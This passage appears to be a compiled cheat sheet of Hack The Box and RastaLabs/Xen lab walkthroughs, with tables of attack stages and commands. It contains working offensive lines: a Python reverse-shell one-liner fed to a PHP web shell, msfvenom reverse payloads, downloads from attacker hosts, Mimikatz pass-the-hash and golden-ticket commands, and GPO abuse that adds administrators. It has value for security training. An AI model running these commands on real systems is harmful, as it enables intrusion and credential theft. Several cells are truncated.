`admin_tasks.sh` for Privilege Escalation | Exploit the `SETENV` option in `sudo` to run `admin_tasks.sh` as root | | 9 | Gaining Root | Python Path Hijacking | Use `PYTHONPATH` hijacking to get a root shell | ### Laser | ID | Stage | Techniques | Commands | | -- | -------------------- | ----------------------------------------------- | ------------------------------------------------------------------------------------ | | 1 | Initial Enumeration | Nmap Scanning | `nmap -sC -sV -oN nmap/ 10.10.10.187` | | 2 | Accessing FTP | Using Found Credentials | Use `ftpuser` credentials found in `credentials.txt` | | 3 | Exploring Web Server | Checking `robots.txt` | Access `http://10.10.10.187/robots.txt` to find disallowed entries | | 4 | Downloading Files | Using FTP to Download Files | Download `html.tar.gz` and `dump.sql` from the server | | 5 | Code Analysis | Reviewing PHP Scripts | Analyze `db_admin.php` and `admin_tasks.php` for potential credentials and functions | | 6 | SSH Access | Using Credentials for SSH | Use `waldo` credentials to access SSH | | 7 | Privilege Escalation | Analyzing Sudo Permissions | Run `sudo -l` to check for allowed commands for `waldo` | | 8 | Exploiting Scripts | Using `admin_tasks.sh` for Privilege Escalation | Exploit the `SETENV` option in `sudo` to run `admin_tasks.sh` as root | | 9 | Gaining Root | Python Path Hijacking | Use `PYTHONPATH` hijacking to get a root shell | ### Unbalanced | ID | Stage | Techniques | Commands | | -- | ------------------- | --------------------------------- | -------------------------------------------------------------------------- | | 1 | Initial Enumeration | Nmap Scanning | `nmap -sC -sV -p- 10.10.10.200 -v --min-rate=10000` | | 2 | Accessing Rsync | Listing Rsync Modules | `nc -vn 10.10.10.200 873` followed by `list` | | 3 | Downloading Backups | Using Rsync to Download Files | `rsync -av rsync://10.10.10.200/conf_backups files` | | 4 | Decrypting Backups | Decrypting EncFS | `python encfs2john.py /root/hackthebox/machine/unbalanced/files/ > hash` | | | | | `john --wordlist=/usr/share/wordlists/rockyou.txt --progress-every=3 hash` | | 5 | Reading Files | Accessing Decrypted Configuration | `encfsctl export files decrypt` | | | | Files | `ls decrypt/` to view the decrypted files | ### SneakyMailer | ID | Stage | Techniques | Commands | | -- | --------------------- | ---------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | 1 | Information Gathering | Nmap Scanning | `nmap -sV -sC -v -p- --min-rate=10000 10.10.10.197` | | 2 | Subdomain Enumeration | Using `ffuf` for Subdomain Brute-Forcing | `./ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb"` | | 3 | Email Collection | Extracting Emails from Web Page | Manually visit `http://sneakycorp.htb/team.php` and extract emails to `mails.txt` | | 4 | Email Engagement | Sending Emails with `swaks` | `while read mail; do swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials / Errors" --body "goto http://10.10.14.4/" --server 10.10.10.197; done < mails.txt` | | 5 | Credential Harvesting | Netcat Listener | `nc -lvp 80` to listen for incoming connections | | 6 | Accessing SMTP | Using `evolution` to Access SMTP | `apt-get install evolution` and configure with SMTP server `10.10.10.197` and email `paulbyrd@sneakymailer.htb` | | 7 | Exploring Sent Items | Checking Sent Emails | Check sent items for any useful information after accessing the SMTP server | ### Notebook | ID | Stage | Techniques | Commands | | -- | --------------------------- | ------------------------- | ------------------------------------------------------------------------ | | 1 | Reconnaissance | Web Server Analysis | Manual inspection of web application on port 80/tcp | | 2 | Vulnerability Analysis | JWT Token Analysis | Decode JWT token, notice "kid" parameter pointing to an internal address | | 3 | Exploitation | Custom JWT Token Creation | Develop `jwt-token.py` to generate a custom JWT token | | 4 | Administration Panel Access | Access with JWT Token | Use generated JWT token to access the admin panel | | 5 | Web Shell Upload | PHP File Upload | Upload a malicious PHP file as allowed by the admin panel | | 6 | Reverse Shell | Exploit PHP File | Get a reverse shell as `www-data` from the uploaded PHP file | | 7 | Post-Exploitation | User Access | Use `home.tar.gz` from `/var/backups/` to login as user `noah` with SSH | | 8 | Privilege Escalation | Docker Exploitation | Use `docker exec -it webappdev01*` as administrator | | 9 | Root Access | CVE-2019-5736 Exploit | Modify and run CVE-2019-5736 exploit to get root access | ### AI | ID | Stage | Techniques | Commands | | -- | -------------------- | ----------------------- | ---------------------------------------------------------------------------------------------------------------- | | 1 | Reconnaissance | Nmap Scan | `nmap -sV -sT -sC -o nmapinitial ai.htb` | | 2 | Web Enumeration | Manual Inspection | Inspect web application on port 80/tcp, hover over logo for menu | | 3 | Web Enumeration | Gobuster Directory Scan | `gobuster dir -u http://ai.htb/ -w /usr/share/wordlists/dirb/common.txt` | | 4 | Audio File Handling | Convert MP3 to WAV | `ffmpeg -i input.mp3 output.wav` | | 5 | SQL Injection | Extract Database Name | Audio payload: "one open single quote union select database open parenthesis close parenthesis comment database" | | 6 | SQL Injection | Enumerate Table Names | Audio payload: "one open single quote union select test from test comment database" | | 7 | SQL Injection | Enumerate Users Table | Audio payload: "one open single quote union select test from users comment database" | | 8 | SQL Injection | Extract Passwords | Audio payload: "one open single quote union select password from users comment database" | | 9 | Privilege Escalation | Exploit JDWP Service | Use `jdwp-shellifier.py` with reverse shell payload | ### ServMon | ID | Stage | Techniques | Commands | | -- | --------------------- | ----------------------------------------- | ------------------------------------------------------------------------------------- | | 1 | Initial Recon | Nmap Scan | `nmap -sC -sV -sS 10.10.10.184` | | 2 | FTP Enumeration | Anonymous FTP Access | `ftp 10.10.10.184` (then use `ls`, `cd`, `get` commands to interact) | | 3 | File Analysis | Reviewing Downloaded Files | `get "Notes to do.txt"`, `get "Confidential.txt"` | | 4 | Web Enumeration | Enumerate Web Pages | Manual inspection of web application on port 80/tcp | | 5 | Exploitation | Exploit NVMS-1000 (CVE-2019-2085) | Use CVE details from Exploit-DB and Brup Suite to exploit | | 6 | Credential Access | Extract Passwords via Directory Traversal | `GET /../../../../../../../../../../../../windows/Users/Nadine/Desktop/Passwords.txt` | | 7 | Brute Force | SSH Brute Force with Hydra | `hydra -L users.txt -P pass.txt 10.10.10.184 ssh` | | 8 | SSH Access | Login via SSH | SSH login with found credentials | | 9 | Privilege Escalation | Exploit NSClient++ 0.5.2.35 | Follow CVE details from Exploit-DB to exploit NSClient++ | | 10 | Local Port Forwarding | Port Forwarding via SSH | Use SSH port forwarding to interact with local services | ### OpenAdmin | ID | Stage | Techniques | Commands | | -- | ----------------------- | ------------------------- | --------------------------------------------------------------------------------- | | 1 | Recon | Nmap Scan | `nmap -sC -sV -sS 10.10.10.171` | | 2 | Web Enumeration | Manual Visit, Gobuster | Visit `http://10.10.10.171`, `gobuster dir -u http://10.10.10.171/ -w common.txt` | | 3 | Exploitation | OpenNetAdmin RCE | Use exploit from `amriunix/ona-rce` repository | | 4 | Initial Foothold | Reverse Shell | Gain reverse shell as `www-data` | | 5 | User Access | Password Reuse | SSH as `jimmy` with reused credentials | | 6 | Internal Service Access | Port Forwarding | Forward port 52846 to local machine and access internal service | | 7 | Privilege Escalation | Cracking Hash | Crack `sha512` hash to obtain `jimmy`'s password | | 8 | SSH Key Access | Decrypt SSH Key | Use `ssh2john` and `john` to decrypt Joanna's SSH key | | 9 | Root Access | Sudo Exploitation of Nano | Use `nano` with sudo to gain root shell based on GTFOBins | ### Magic | ID | Stage | Techniques | Commands | | -- | ----------------------- | ------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | 1 | Nmap Scanning | Nmap Scan | `nmap -sC -sV -sS -T4 10.10.10.185` | | 2 | Enumerating Web Page | Manual Visit | Visit `http://10.10.10.185` | | 3 | Bypass Login | SQL Injection | Use `'or''='` for both username and password | | 4 | Uploading Shell | Bypass File Upload Restrictions | `exiftool -Comment='"; system($_GET['cmd']); ?>' me.jpg` | | 5 | Gaining Access | Reverse Shell | `http://10.10.10.185/images/uploads/me.php.jpg?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.43",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` | | 6 | Enumerating Credentials | Reading Configuration Files | `cat /var/www/Magic/db.php5` | | 7 | Switching User Shell | User Switching | `su theseus` with password `iamkingtheseus` | | 8 | Find SUID files | Privilege Escalation | Not specified in the summary | | 9 | Getting ROOT | Exploitation | Not specified in the summary | ### Spectra | ID | Stage | Techniques | Commands | | -- | -------------------- | ------------------------------- | --------------------------------------------------------------------------------- | | 1 | Recon | Nmap Scan | `nmap -sC -sV -sS -T4 10.10.10.229` | | 2 | Web Enumeration | Manual Visit, Gobuster | Visit `http://10.10.10.229`, `gobuster dir -u http://10.10.10.229/ -w common.txt` | | 3 | Web Enumeration | Inspect Source Code | Inspect source code of `http://spectra.htb/wp-config.php.save` | | 4 | Credential Access | Username and Password Discovery | Found credentials: username `administrator`, password `devteam01` | | 5 | Web Exploitation | WordPress Admin Login | Login to WordPress admin panel with found credentials | | 6 | Reverse Shell | Metasploit Reverse Shell | Use `msfconsole` and `exploit/unix/webapp/wp_admin_shell_upload` | | 7 | Privilege Escalation | Sudo Privileges Exploitation | Use `sudo` with `initctl` for privilege escalation | | 8 | Privilege Escalation | Editing Service Configuration | Edit `/etc/init/test.conf` to add `chmod +s /bin/bash` | | 9 | Privilege Escalation | Gaining Root Access | Execute `/bin/bash -p` to spawn a shell with root privileges | ### Sink | ID | Stage | Techniques | Commands | | -- | ----------------- | ------------------------------ | -------------------------------------------------------------------------------- | | 1 | Recon | Nmap Scan | `nmap -sC -sV -p- 10.10.10.225` | | 2 | Web Enumeration | Inspect Source Code | Inspect source code for CVE-2019-18277 vulnerability | | 3 | Exploitation | HTTP Request Smuggling | Edit and send crafted HTTP requests to exploit CVE-2019-18277 | | 4 | Post-Exploitation | Capture Admin Cookie | Reload the home page to capture the admin cookie after the exploit | | 5 | Privilege Access | Use Credentials Found in Notes | Use credentials from notes to access different services (Chef, Dev Node, Nagios) | | 6 | Privilege Access | Access Gitea Service | Log in to Gitea service with found credentials | | 7 | Privilege Access | Find SSH Key for User | Find `id_rsa_marcus` key for user Marcus on Gitea service | | 8 | Privilege Access | Use SSH Key to Gain Access | Use `id_rsa_marcus` to SSH into the machine as Marcus | ### Ready | ID | Stage | Techniques | Commands | | -- | -------------------- | ----------------------------------- | -------------------------------------------------------------------------------------------- | | 1 | Recon | Nmap Scan | `nmap -sC -sV -p- 10.10.10.220` | | 2 | Web Enumeration | GitLab Sign In Page | Inspect GitLab sign in page for vulnerabilities | | 3 | Exploitation | GitLab 11.4.7 Remote Code Execution | Follow steps from LiveOverflow video & article for RCE | | 4 | Reverse Shell | Gain Reverse Shell | Use the payload from the video to gain a reverse shell | | 5 | Post-Exploitation | Find Credentials | Locate `gitlab.rb` in `/opt/backup` to find SMTP password | | 6 | Privilege Access | Use Found Credentials | Use found SMTP password to change user and gain root access in the docker container | | 7 | Privilege Escalation | Escaping Docker Container | Follow steps from the "Escaping Docker Privileged Containers" article to escalate privileges | | 8 | Root Access | SSH Key | Use the provided `id_rsa` key to SSH into the root account | ### Pivotapi | ID | Stage | Techniques | Commands | | -- | ----------------- | ---------------------------------------- | -------------------------------------------------------------------------------- | | 1 | Recon | Nmap Scan | `nmap -sC -sV -oA nmap/result 10.10.10.240` | | 2 | FTP Enumeration | Anonymous FTP Access | `ftp -pi 10.10.10.240` followed by `ls` and `mget *` to download files | | 3 | Metadata Analysis | ExifTool Analysis | \`exiftool \* | | 4 | Kerberos Attack | GetNPUsers.py Kerberos Preauthentication | `GetNPUsers.py -dc-ip 10.10.10.240 -no-pass -usersfile user.lst LicorDeBellota/` | | 5 | Hash Cracking | John the Ripper | `john hash -w=/usr/share/wordlists/rockyou.txt` to crack Kerberos hash | ### Openkeys | ID | Stage | Techniques | Commands | | -- | -------------------- | ------------------------- | ----------------------------------------------------------------------------------------- | | 1 | Initial Scanning | Nmap Scan | `nmap -sC -sV -oN nmap 10.10.10.199` | | 2 | Web Enumeration | Directory Scan | `dirsearch -u 10.10.10.199 -w /opt/common.txt -e *` | | 3 | Exploitation | Vulnerability in OpenBSD | Use `-schallenge` as a username to bypass authentication | | 4 | SSH Key Discovery | Cookie Modification | Modify the cookie to include a valid username to reveal SSH keys | | 5 | SSH Access | Use Discovered SSH Key | `ssh -i id_rsa jennifer@10.10.10.199` | | 6 | Privilege Escalation | Local Exploit for OpenBSD | `nano authroot; chmod +x authroot; ./authroot` to exploit CVE-2019-19520 / CVE-2019-19522 | ### Oouch | ID | Stage | Techniques | Commands | | -- | -------------------- | ---------------------------- | ------------------------------------------------------------- | | 1 | Reconnaissance | Nmap Scan | `nmap -sV -sC -T4 -p- oouch.htb` | | 2 | Web Enumeration | Directory Scan | `gobuster dir -u http://oouch.htb:5000/ -w big.txt` | | 3 | OAuth Exploitation | SSRF in Contact Page | Use SSRF to link account with admin | | 4 | Access Token | Intercept Request with Burp | Intercept `/oauth/connect` request to get token-code | | 5 | SSH Key Discovery | Accessing SSH Private Keys | Access API to retrieve SSH keys | | 6 | Docker Exploitation | Exploit Docker UWSGI Service | Log into Docker and exploit UWSGI service running as www-data | | 7 | Privilege Escalation | Exploit Dbus | Exploit Dbus to get a shell as root and obtain root.txt | ### Fuse | id | stage | techniques | commands | | -- | -------------------- | ------------------------------ | --------------------------------------------------------------------------------------------------- | | 1 | Recon | Nmap scan | `nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb` | | 2 | Enumeration | Enumerating SMB, HTTP, and RPC | `enum4linux fuse.htb`, `smbclient -L fuse.htb`, `rpcclient -U FABRICORP\\tlavel 10.10.10.193` | | 3 | Exploitation | Password Spraying | `msf > use auxiliary/scanner/smb/smb_login`, `medusa -h fuse.htb -U users.txt -P wordlist -M smbnt` | | 4 | Privilege Escalation | Abusing SeLoadDriverPrivilege | Compiling files with Visual Studio, using `eoploaddriver.exe` and `ExploitCapcom.exe` | | 5 | Post-Exploitation | Accessing Admin Shell | `evil-winrm -u Administrator -H -i fuse.htb` | ### Cereal 1. **Reconnaissance**: * **Techniques**: Port scanning with Nmap, adding domain names to the `/etc/hosts` file. * **Commands**: `nmap -sC -sV -oA /result 10.10.10.217`, `cat nmap/result.nmap`. 2. **Enumeration**: * **Techniques**: Using Gobuster to find directories, dumping `.git` directory with GitTools. * **Commands**: `gobuster dir -u http://cereal.htb -w wordlist`, `bash gitdumper.sh http://source.cereal.htb/.git/ /root/Desktop/HTB/Cereal/dump/`. 3. **Exploitation**: * **Techniques**: Exploiting Cross-site Scripting (XSS) to trigger deserialization, creating JWT tokens, uploading a shell. * **Commands**: `python3 jwt_tool.py -b -S hs256 -p 'secret'`, `bash extractor.sh ../../dump/ /root/Desktop/HTB/Cereal/all_dump/`. 4. **Gaining Access**: * **Techniques**: Uploading and executing a shell, using Python scripts to automate tasks. * **Commands**: `python3 -m http.server 80`, `nc -nvlp 9001`, `python3 dedsec.py`, `curl -k https://source.cereal.htb/uploads/shell.aspx`. 5. **Privilege Escalation**: * **Techniques**: Port forwarding, exploiting `SEImpersonation` privilege with JuicyPotato, using GraphQL for SSRF. * **Commands**: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9003 -f exe -o ded.exe`, `curl http://10.10.14.6/ded.exe -o C:\\temp\\ded.exe`, `nc -nvlp 1337`. 6. **Post-Exploitation**: * **Techniques**: Maintaining access, executing reverse shells. * **Commands**: `.\\GenericPotato.exe -p "C:\\temp\\nc64.exe" -a "10.10.14.6 1337 -e powershell" -e HTTP -l 8889`. ### Bucket | id | stage | techniques | commands | | -- | -------------------- | ----------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------- | | 1 | Recon | Nmap scan to find open ports | `nmap -sC -sV -oA /result 10.10.10.212` | | 2 | Enumeration | Gobuster to find directories | `gobuster dir -u http://s3.bucket.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt` | | 3 | AWS Configuration | Configure AWS CLI | `aws configure` | | 4 | Data Extraction | List tables and contents in DynamoDB | `aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request` | | | | | `aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request` | | 5 | Exploitation | Upload PHP reverse shell to the server | `aws --endpoint-url http://s3.bucket.htb/ s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/` | | 6 | Privilege Escalation | Port forwarding and exploiting a web service for code execution as root | `ssh -L 8000:127.0.0.1:8000 roy@10.10.10.212` | | | | Create and trigger payload to get root's id\_rsa | `curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v` | ### Armageddon | id | stage | techniques | commands | | -- | -------------------- | ---------------------------------------------- | ----------------------------------------------------------------------------------------- | | 1 | Recon | Nmap scanning | `nmap -sC -sV -oA nmap/result 10.10.10.233` | | 2 | Exploitation | Drupalgeddon 2 Forms API Property Injection | `msf6 > use exploit/unix/webapp/drupal_drupalgeddon2` followed by setting options and run | | 3 | Gaining Access | Finding credentials in settings.php | Inspect `/var/www/html/sites/default/settings.php` for MySQL credentials | | 4 | Database Access | Accessing MySQL database | `mysql -u drupaluser -p -e 'show databases;'` | | 5 | Data Exfiltration | Dumping usernames and password hashes | `mysql -u drupaluser -p -D drupal -e 'select name,pass from users;'` | | 6 | Password Cracking | Using John the Ripper to crack password hashes | `john hash -w=/usr/share/wordlists/rockyou.txt` | | 7 | Access with SSH | SSH into the machine with cracked credentials | `ssh brucetherealadmin@10.10.10.233` | | 8 | Privilege Escalation | Exploiting snapd (dirty\_sock exploit) | Use the dirty\_sock exploit to escalate privileges | | 9 | Capture Flag | Reading user and root flags | `cat user.txt` and `cat root.txt` | ### Traceback | id | stage | techniques | commands | | -- | --------------------------- | ----------------------------------------------- | -------------------------------------------------------------------------- | | 1 | Recon | Nmap scanning | `nmap -sC -sV 10.10.10.181` | | 2 | Enumeration | Source code analysis, Gobuster | `gobuster dir -w shells.txt -u http://10.10.10.181` | | 3 | Exploitation | Accessing web shell | Navigate to `http://10.10.10.181/smevk.php`, login with default creds | | 4 | Access | SSH key upload | `ssh-keygen`, upload `id_rsa.pub` as `authorized_keys` | | 5 | Initial Access | SSH as webadmin | `ssh webadmin@10.10.10.181 -i id_rsa` | | 6 | Privilege Escalation (User) | Using `luvit` to execute commands as `sysadmin` | `sudo -u sysadmin /home/sysadmin/luvit`, then `os.execute("/bin/bash -i")` | | 7 | Capture User Flag | Reading user flag | `cat /home/sysadmin/user.txt` | | 8 | Privilege Escalation (Root) | Modifying `00-header` for command execution | `echo "id" >> /etc/update-motd.d/00-header` | | 9 | Capture Root Flag | Reading root flag | `echo "cat /root/root.txt" >> /etc/update-motd.d/00-header` | ### Rastalab1 | ID | Stage | Techniques | Commands | | -- | ---------------- | ---------------- | --------------------------------------------------------------- | | 1 | Initial Scanning | Masscan | `masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0` | | 2 | Host Discovery | Nmap Scan | `nmap scan on 10.10.110.10`, `nmap scan on 10.10.110.254` | | 3 | Domain Discovery | CrackMapExec | `crackmapexec on 10.10.110.10`, `crackmapexec on 10.10.110.254` | | 4 | Network Mapping | Host Enumeration | Hostnames and IPs: DC01 - 10.10.120.1, FS01 - 10.10.120.5, etc. | ### Rastalab2 | ID | Stage | Techniques | Commands | | -- | ----------------- | ------------------------- | --------------------------------------------------------------------------- | | 1 | Reconnaissance | Outlook Version Discovery | Check outlook version on port 443 at 10.10.110.254 | | 2 | Enumeration | Web Page Analysis | Analyze Rastalabs website on 10.10.110.10 on port 80 | | 3 | User Profiling | Social Media Analysis | Review Amber Hope's LinkedIn and Instagram profiles | | 4 | Credential Access | Brute Force | Use Metasploit `auxiliary/scanner/http/owa_login` to brute force | | 5 | Access | Outlook Login | Login with credentials 'RLAB\ahope' : 'Labrador8209' | | 6 | Flag Discovery | Task Navigation | Navigate to tasks in Outlook to find the flag `RASTA{ph15h1n6_15_h4rdc0r3}` | ### Rastalab3 | ID | Stage | Techniques | Commands | | -- | --------------------- | --------------------------- | --------------------------------------------------------------------------------------------------- | | 1 | Credential Dumping | Vault Credential Extraction | `Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force` | | 2 | Credential Dumping | Mimikatz Execution | `sekurlsa::dpapi`, `dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\` | | 3 | Credential Decryption | DPAPI Master Key Usage | `dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\ /masterkey:` | | 4 | Remote Desktop | Port Forwarding | `portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389` | | 5 | Remote Desktop | Remmina Configuration | Import `.rdp` file, change host, export to `.rdp` file | | 6 | Remote Desktop | FreeRDP Connection | `xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local` | | 7 | Flag Discovery | Task Navigation | Flag found: `RASTA{c00k1n6_w17h_645_n0w}` | ### Rastalab4 | ID | Stage | Techniques | Commands | | -- | --------------------- | ----------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------- | | 1 | RDP Access | Remote Desktop Protocol | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using `epugh_adm` creds | | 2 | GPO Enumeration | Group Policy Object Enumeration | \`Get-NetGPO | | 3 | Group Membership | Group Membership Checking | `net user epugh_adm /domain` | | 4 | GPO Permission Find | GPO Permission Enumeration | \`Get-NetGPO -ComputerName fs01.rastalabs.local | | 5 | GPO Abuse | Group Policy Object Abuse | `New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force` | | 6 | Add to Administrators | Adding User to Administrators Group | `New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force` | | 7 | Clean Up | Group Policy Object Task Removal | `New-GPOImmediateTask -Remove -Force -GPODisplayName "Test GPO"` | | 8 | File Permissions | Modifying File Access Control Lists | `icacls flag.txt /grant administrators:F` | | 9 | Flag Discovery | Retrieving Sensitive Information | Flag found: `RASTA{6p0_4bu53_15_h4rdc0r3}` | ### Rastalab5 | ID | Stage | Techniques | Command | | -- | --------------- | ---------------------------- | ---------------------------------------------------------------------------------------------- | | 1 | RDP Access | Remote Desktop Protocol | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using `epugh_adm` creds | | 2 | SQL Interaction | SQL Server Management Studio | Start SQL Management Studio, connect via Windows authentication, query Umbraco database | | 3 | Data Extraction | SQL Query Execution | `SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'` | | 4 | Flag Discovery | SQL Data Retrieval | `select * from Flag` which revealed the flag `RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}` | ### Rastalab6 | ID | Stage | Techniques | Command | | -- | ------------------ | ----------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | 1 | RDP Access | Remote Desktop Protocol | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using `epugh_adm` creds | | 2 | Credential Dumping | Invoke Mimikatz | Run `p0wnedshell.exe` with admin cmd, option 4, invoke mimikatz to get the NTLM hash of `rweston_da` | | 3 | Pass-the-Hash | Mimikatz Pass-the-Hash | `sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa` | | 4 | Golden Ticket | Kerberos Golden Ticket Attack | `kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-... /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\Users\GOPIKR~1\Desktop\rweston_da.ticket` | | 5 | Ticket Injection | Kerberos Ticket Injection | `kerberos::ptt C:\Users\GOPIKR~1\Desktop\rweston_da.ticket` | | 6 | Flag Discovery | Access Domain Controller | `pushd \\dc01.rastalabs.local\C$` to access the domain controller and discover the flag `RASTA{r4574l4b5_ch4mp10n}` | ### Rastalab7 | ID | Stage | Techniques | Command | | -- | -------------------- | ------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | 1 | Port Forwarding | Local Port Forwarding | `portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445` | | 2 | Remote Shell Access | MSF psexec / Impacket psexec | Use msf or impacket psexec to get shell on ws01 | | 3 | Routing | Meterpreter Routing | Add route in meterpreter, set socks4a proxy in msf | | 4 | Hash Dumping | CrackMapExec with Proxychains | `proxychains crackmapexec 10.10.120.1 -u rweston_da -H ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa --ntds drsuapi` | | 5 | Credential Access | Mimikatz Credential Dump | `dpapi::cred /in:C:\\users\\rweston\\AppData\\Local\\Microsoft\\Credentials\\849B07832DF408F54711A4BD0EB36FD5 /masterkey:bbfdda29906cd49b7ca3e019a1f2dd79d153611a2c3e932520e41b3d228cec844e2ae46faa2abe236612f52da93b26e85d08c562a7288327d318a65b641f23af` | | 6 | Clipboard Monitoring | PowerShell Clipboard Monitoring | Use PowerShell to monitor clipboard: `powershell -command "& { iwr http://10.10.14.83/emp.bat -OutFile empire_new.bat}"` | | 7 | RDP Connection | Remote Desktop Connection | `xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10` | | 8 | Flag Discovery | Flag Retrieval | Flag found: `RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}` | ### Rastalab8 | ID | Stage | Techniques | Command | | -- | --------------- | --------------------- | --------------------------------------------------------- | | 1 | Port Forwarding | Local Port Forwarding | `portfwd add -L 10.10.14.83 -r 10.10.120.1 -l 445 -p 445` | | 2 | Remote Shell | Impacket psexec | Use impacket psexec to get shell on dc01 | | 3 | Log Enumeration | Windows Event Logs | \`Get-EventLog -LogName "Application" | | 4 | Flag Discovery | Log Analysis | Flag found: `RASTA{1nc1d3n7_r35p0nd3r5_l0v3_l065}` | ### Rastalab9 | ID | Stage | Techniques | Command | | -- | -------------------- | ---------------------------------- | ---------------------------------------------------------------------------------------------- | | 1 | File Access | Accessing Network Share | `net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"` | | 2 | File Conversion | Convert PPK to OpenSSH | `puttygen nix01.ppk -O private-openssh -o nix` | | 3 | SSH Connection | Proxychains with SSH | `proxychains ssh -i nix ahope@10.10.122.20` | | 4 | Privilege Escalation | Compile and Transfer Exploit | `gcc exp1.c -o exploit` and `proxychains scp -i nix -r exploit ahope@10.10.122.20:/home/ahope` | | 5 | File Transfer | Secure Copy (SCP) with Proxychains | `proxychains scp -i nix ahope@10.10.122.20:/usr/local/sbin/paycalc /root/Desktop/rasta` | | 6 | Flag Discovery | Flag Retrieval | Flag found: `RASTA{y0ur3_4_b4lh15}` | ### Xen | id | stage | techniques | commands | | -- | --------------------- | ---------------------------------- | ---------------------------------------------------------------------------------------------------------------------- | | 1 | Initial Recon | NMAP Scan | `nmap -p- -sT -sV -sC -oN initial-scan 10.13.38.12` | | 2 | Web Enumeration | Directory Enumeration with wfuzz | `wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ` | | 3 | SMTP Enumeration | smtp-user-enum | `smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12` | | 4 | Phishing | Crafting Email | `telnet 10.13.38.12 25` followed by SMTP commands | | 5 | Access | Citrix XenAPP | Login with captured credentials | | 6 | Gaining a Shell | Reverse Shell with msfvenom | `msfvenom –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe > x86exploit.exe` | | 7 | Privilege Escalation | Local Exploit Suggester | `use post/multi/recon/local_exploit_suggester` in Metasploit | | 8 | Network Scanning | Internal Network Scan | Use auxiliary/server/socks4a in Metasploit for proxying | | 9 | Kerberoasting | Harvesting Tickets | `Invoke-Kerberoast` in PowerShell | | 10 | Password Cracking | hashcat | `hashcat -m 13100 ./mturner rockyou.txt --rules` | | 11 | SMB Access | smbmap and smbclient | `smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201` | | 12 | Putty File Conversion | putty2john | `putty2john private.ppk > private.hash` | | 13 | NetScaler Access | SSH with Private Key | `ssh -i id_rsa nsroot@172.16.249.202` | | 14 | Traffic Analysis | tcpdump | \`tcpdump -s 0 -A -n -l | | 15 | LDAP Passwords | Capture and Analyze with Wireshark | `tcpdump -w capture.pcap` and analyze with Wireshark | | 16 | Domain Privilege | WinRM Access | `ruby winrm_shell_with_upload.rb` | | 17 | Shadow Copies | Diskshadow | `diskshadow` commands to create and expose shadow copies | | 18 | Domain Admin Access | Pass the Hash | `wmiexec.py -hashes :aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200` | ### Broker | id | stage | techniques | command | | -- | ----------------- | ------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------- | | 1 | Reconnaissance |

- Nmap scan
- Enumerating SMB

|

- nmap -sC -sV -oA nmap/initial 10.10.11.130
- smbclient -L \\\10.10.11.130\\

| | 2 | Gaining Access | - Exploiting SMB vulnerability | - `smbclient \\\\10.10.11.130\\backups` | | 3 | Enumeration |

- Searching for files
- Analyzing found files

| - `get "Azure Diamond.json"` | | 4 | Privilege Esc. |

- Using credentials found
- Accessing Azure

| - `evil-winrm -i 10.10.11.130 -u 'azureuser' -p 'MyPassword!'` | | 5 | Post-Exploitation |

- Dumping hashes
- Cracking hashes

|

- hashdump
- john hashes --wordlist=/usr/share/wordlists/rockyou.txt

